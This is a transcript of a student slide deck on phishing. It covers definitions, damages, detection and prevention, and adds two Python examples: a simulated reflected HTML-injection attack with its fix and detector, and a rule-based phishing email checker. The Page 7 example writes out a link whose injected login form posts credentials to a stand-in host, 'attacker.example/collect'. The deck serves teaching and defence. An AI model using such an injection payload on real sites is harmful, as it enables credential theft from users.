Phishing

PHISHING BY:- Sagar Rai P, I MSc Computer Science

Transcript of Phishing

Page 1: Phishing


Page 2: Phishing

PHISHING BASICS
•The name is often expanded as "password harvesting", but it is usually traced to "fishing" for passwords, spelled with "ph" after the older term "phreaking".
•Phishing is the attempt to obtain sensitive information such as usernames, passwords, and credit card details (and sometimes, indirectly, money), often for malicious reasons, by masquerading as a trustworthy entity in an electronic communication.
•Also known as "brand spoofing".
•Phishers are the people who run phishing campaigns.
•The technique was described in detail in 1987 and was first used against real users in 1995.

Page 3: Phishing

Phishing Definition
•As defined above: the attempt to obtain sensitive information such as usernames, passwords, and credit card details by masquerading as a trustworthy entity in an electronic communication.
•It tries to trick users with official-looking messages that appear to come from organizations they already deal with, typically:

• Credit card issuers
• Banks
• eBay
• PayPal

•Some phishing emails also carry malicious or unwanted software that can track your activity or slow down your computer.

Page 4: Phishing

Comparison To Spam
•The purpose of a phishing message is to acquire sensitive information from a user, so the message must deceive its recipient.

•It carries no useful information for the recipient, so, being unsolicited bulk mail, it falls under the broad category of spam.

•Ordinary spam tries to sell a product or service, whereas a phishing message needs to look like it comes from a legitimate organization the recipient trusts.
•Techniques that filter ordinary spam therefore can't be applied naively to phishing messages.

Page 5: Phishing

Existing System
•Detect and block phishing websites in time (takedowns and blocklists).
•Enhance the security of the legitimate websites being impersonated.
•Block phishing emails with spam filters.
•Install anti-phishing software (browser filters and toolbars) on users' computers.

Page 6: Phishing

Top 10 Phishing Sites Hosting Countries

Page 7: Phishing

How a Phishing Attack Works (HTML-injection variant)
•The attacker finds a page on the target site (an online shop, internet banking, a payment system, etc.) that reflects a request parameter into its HTML without escaping it (a reflected XSS / HTML-injection flaw) and uses it to embed a fake login form.
•The attacker emails the victim a link to this page. The link points at the real site, but carries the injected HTML as a parameter. The email is made to look like the messages the site normally sends its registered users (typically without the user's name in the greeting, because the attacker does not know it).
•The victim clicks the link and the real site renders the attacker's form. If the victim enters a username and password, the form posts them to the attacker's web server.
•The victim may notice nothing strange, because the surrounding "Home" or "Welcome" page is the genuine one they expected to see.
•Because the form is served from the legitimate domain, the address-bar and "https://" checks recommended later do not reveal this variant; the fix has to come from the site, by escaping untrusted input before it is written into the page.
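The attack described above, as an added example that is not part of the original slides: a page that reflects a search parameter into its HTML unescaped, the link an attacker would mail out with a login form injected through that parameter, the same page with output encoding applied, and a check that spots forms posting to another host. The shop URL, the attacker's collector URL and the page template are assumptions made for the illustration; nothing touches the network, rendering is simulated with plain string functions.

```python
# Added example (not from the original slides): a reflected HTML-injection
# page abused to host a phishing form, the same page with output encoding,
# and a check that spots forms posting off-site. The shop URL, the attacker
# URL and the page template are assumptions made for this illustration;
# nothing touches the network, rendering is simulated with string functions.
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlencode, urlsplit

SITE = "https://shop.example"                     # assumed legitimate site
COLLECTOR = "https://attacker.example/collect"    # assumed attacker server

PAGE = (
    "<html><body><h1>Welcome back</h1>"
    '<form action="/login" method="post">'        # the site's own, legitimate form
    '<input name="user"><input name="pass" type="password"></form>'
    "<p>Results for: {q}</p></body></html>"
)


def _query_param(url, name):
    """Return the first value of ?name= in url, or '' if absent."""
    return parse_qs(urlsplit(url).query).get(name, [""])[0]


def render_vulnerable(url):
    """Echoes the search term straight into the HTML: the injection flaw."""
    return PAGE.format(q=_query_param(url, "q"))


def render_fixed(url):
    """Same page, but the untrusted value is HTML-escaped before insertion."""
    return PAGE.format(q=html.escape(_query_param(url, "q"), quote=True))


def craft_phishing_link():
    """Build the link the attacker mails out: a URL on the real site whose
    parameter carries a login form that posts to the attacker's server."""
    fake_form = (
        '<form action="%s" method="post">'
        "Your session has expired, please log in again: "
        '<input name="user"><input name="pass" type="password">'
        '<input type="submit" value="Login"></form>' % COLLECTOR
    )
    return SITE + "/search?" + urlencode({"q": fake_form})


class _FormActions(HTMLParser):
    """Collects the action attribute of every <form> in a page."""

    def __init__(self):
        super().__init__()
        self.actions = []

    def handle_starttag(self, tag, attrs):
        if tag == "form":
            self.actions.append(dict(attrs).get("action") or "")


def offsite_form_actions(page, site=SITE):
    """Return the actions of forms that would send data to another host.
    A relative action (the site's own login form) has no host and is fine."""
    parser = _FormActions()
    parser.feed(page)
    home = urlsplit(site).netloc
    return [a for a in parser.actions
            if urlsplit(a).netloc and urlsplit(a).netloc != home]


if __name__ == "__main__":
    link = craft_phishing_link()
    print("phishing link:", link[:80] + "...")
    print("vulnerable page posts to:", offsite_form_actions(render_vulnerable(link)))
    print("fixed page posts to:", offsite_form_actions(render_fixed(link)))
```

The escaped page still contains the attacker's text, but as literal characters (`&lt;form ...`), so the browser draws no form and nothing is posted anywhere. The off-site form check is the kind of test a site owner or a browser-side filter can run; it does not help the user, who sees the real domain in the address bar either way.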

Page 8: Phishing

How a Phishing Attack Works

Page 9: Phishing

Damages Caused By Phishing

•The damage caused by phishing ranges from loss of access to an email account to substantial financial loss. This style of identity theft is becoming more popular because of the ease with which unsuspecting people divulge personal information to phishers, including credit card numbers, social security numbers, and mothers' maiden names. There are also fears that identity thieves can obtain some of this information simply by accessing public records. Once they have the information they need, phishers use the victim's details to open fake accounts in the victim's name, using up the victim's credit, or even to lock the victim out of their own accounts.

Page 10: Phishing

How To Detect Phishing Website?

Page 11: Phishing

What Does a Phishing Email Message Look Like?

•Spelling and bad grammar. Cybercriminals are not known for their grammar and spelling, whereas a legitimate company usually proofreads its mail.
•Links in email. If you see a link in a suspicious message, don't click on it; the visible text of a link and its real destination can differ.
•Threats. Have you ever received a warning that your Hotmail account would be closed if you didn't respond to an email? The message shown on the next slide is an example of this trick.
•Spoofing of popular websites or companies. Scam artists use graphics in an email that appear to belong to legitimate websites but actually take you to phony scam sites or legitimate-looking pop-up windows.

Page 12: Phishing

What Does a Phishing Email Message Look Like? (example)

Page 13: Phishing

Example for Phishing Website

Page 14: Phishing

Functions.

Page 15: Phishing

Prevention to be taken to avoid Phishing
•Prevention: What to do
•Protect your computer with anti-virus software, spyware filters, e-mail filters, and a firewall, and make sure they are regularly updated.
•Keep your Internet browser up to date, with security patches applied.
•Avoid responding to any unknown email, and never give your financial information in reply to one.
•Unless the email is digitally signed, you cannot be sure it is genuine (and a signature only helps if you check who signed it).
•Phishers typically ask for information such as usernames, passwords, credit card numbers and social security numbers; a legitimate organization does not request these by email.

Page 16: Phishing

Prevention to be taken to avoid Phishing
•Phishing messages are typically not personalized, while valid messages from your bank or e-commerce company generally are.
•Always ensure that you're using a secure website when submitting credit card or other sensitive information via your Web browser.
•To check that you're on a secure Web server, look at the beginning of the address bar: it should read "https://" rather than just "http://". Also check that the domain name is the one you expect; a phishing site can obtain its own valid certificate and show "https://" too.
•Log into your online accounts regularly; don't leave them untouched for long periods.
•Regularly check your bank, credit and debit card statements to ensure that all transactions are legitimate.
•If anything is suspicious, contact your bank and all card issuers.
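The indicators from the "What does a phishing email look like?" slide and the personalization and "https://" checks above, turned into a small rule-based check. This is an added example, not material from the original slides: the two messages, their sender addresses and their domains are constructed for the illustration and do not refer to any real mail. It flags threat language, a generic greeting, links whose shown text and real destination are on different hosts, and plain-http links; spelling and grammar are left out because they need a dictionary rather than a rule.

```python
# Added example (not from the original slides): a rule-based check of an
# email against the indicators listed above (threats, generic greeting,
# links whose shown text and real destination differ, plain-http links).
# Both messages, their sender addresses and domains are constructed for
# the illustration. Spelling checks are left out: they need a dictionary.
import re
from email import message_from_string
from urllib.parse import urlsplit

PHISH = """\
From: "Hotmail Support" <support@hotmail-secure-login.example>
To: customer@example.org
Subject: Your account will be closed
Content-Type: text/html

<html><body>
<p>Dear Customer,</p>
<p>Your account will be closed within 24 hours unless you verify your
details at the link below.</p>
<p><a href="http://hotmail-secure-login.example/verify">https://account.hotmail.com/verify</a></p>
</body></html>
"""

GENUINE = """\
From: "Example Bank" <statements@examplebank.example>
To: alice@example.org
Subject: Your March statement is ready
Content-Type: text/html

<html><body>
<p>Dear Alice Smith,</p>
<p>Your statement is available in online banking.</p>
<p><a href="https://www.examplebank.example/statements">https://www.examplebank.example/statements</a></p>
</body></html>
"""

THREATS = ("will be closed", "will be suspended", "within 24 hours", "verify your")
GENERIC = ("dear customer", "dear user", "dear member", "dear valued")
ANCHOR = re.compile(r'<a\s[^>]*href="([^"]+)"[^>]*>(.*?)</a>', re.I | re.S)
TAG = re.compile(r"<[^>]+>")


def analyze_email(raw):
    """Return the list of indicator names found in the message, [] if none."""
    body = message_from_string(raw).get_payload()
    text = " ".join(TAG.sub(" ", body).split()).lower()   # visible text only
    findings = []
    if any(t in text for t in THREATS):
        findings.append("threat")
    if any(g in text for g in GENERIC):
        findings.append("generic-greeting")
    for href, shown in ANCHOR.findall(body):
        target = urlsplit(href)
        shown = TAG.sub("", shown).strip()
        if target.scheme == "http":
            findings.append("insecure-link:" + target.netloc)
        # Only compare hosts when the link text itself looks like a URL;
        # a link labelled "click here" gives nothing to compare against.
        shown_host = urlsplit(shown).netloc if "://" in shown else ""
        if shown_host and shown_host.lower() != target.netloc.lower():
            findings.append("link-mismatch:%s->%s" % (shown_host, target.netloc))
    return findings


if __name__ == "__main__":
    print("phishing sample:", analyze_email(PHISH))
    print("genuine sample:", analyze_email(GENUINE))
```

The same rules can be run by a mail filter or by a user pasting a suspicious message; the link-mismatch rule is the one that most directly implements "don't use the links in an email", since it exposes the destination the visible text hides.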

Page 17: Phishing

Prevention: What not to do
•Don't assume that you can identify a website as legitimate just by looking at it.
•Don't use the links in an email to get to any web page if you think the message might not be authentic.
•Instead, reach the website directly by typing its address into your browser, or use a bookmark you saved earlier.
•Avoid filling out forms in email messages that ask for personal financial information.
•Only communicate information such as credit card numbers or account details via a secure website or by telephone, using a number you obtained independently of the email.

Page 18: Phishing

Conclusion
•Phishing is identity theft. It is fraud. It masquerades as legitimate and trustworthy entities in order to obtain sensitive data, then uses that data to "rip off" the misled user, often with serious consequences.
•Phishing is a form of criminal conduct that poses an increasing threat to consumers, financial institutions and commercial enterprises in Canada, the United States and other countries. Because phishing shows no sign of abating, and is likely to continue in newer and more sophisticated forms, law enforcement agencies in these and other countries will need to cooperate more closely than ever in their efforts to combat it, through improved public education, prevention, authentication, and national and binational enforcement efforts.

Page 19: Phishing

Source Of Information
•www.wikipedia.org
•www.antiphishing.org
•www.google.com
•www.webopedia.com
•www.computerworld.com
•www.honeynet.org

Page 20: Phishing